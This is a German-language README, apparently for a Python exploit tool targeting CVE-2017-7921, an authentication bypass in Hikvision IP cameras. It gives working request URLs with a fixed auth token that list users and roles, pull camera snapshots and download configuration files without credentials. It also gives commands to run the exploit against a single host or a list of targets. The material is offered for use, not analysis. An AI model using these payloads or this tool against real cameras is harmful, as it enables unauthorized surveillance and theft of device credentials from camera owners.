
Python-Exploit für CVE-2017-7921 in Hikvision-IP-Kameras, der eine nicht authentifizierte Benutzeraufzählung, das Erfassen von Schnappschüssen und das Herunterladen von Konfigurationsdateien über manipulierte HTTP-Anfragen durchführt.
In Hikvision Geräten wurde ein Problem mit unsachgemäßer Authentifizierung entdeckt.
Die Sicherheitslücke durch unsachgemäße Authentifizierung tritt auf, wenn eine Anwendung Benutzer nicht angemessen oder korrekt authentifiziert.
Dies kann einem böswilligen Benutzer ermöglichen, seine Privilegien auf dem System zu erweitern und Zugriff auf vertrauliche Informationen zu erhalten.
https://seclists.org/fulldisclosure/2017/Sep/23
Schwachstellendetails:
----------------------
Eine Liste aller Benutzer und ihrer Rollen abrufen:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Ein Kamera-Snapshot ohne Authentifizierung erhalten:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
Und das Schlimmste: Man kann die Kamera-Konfiguration herunterladen:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
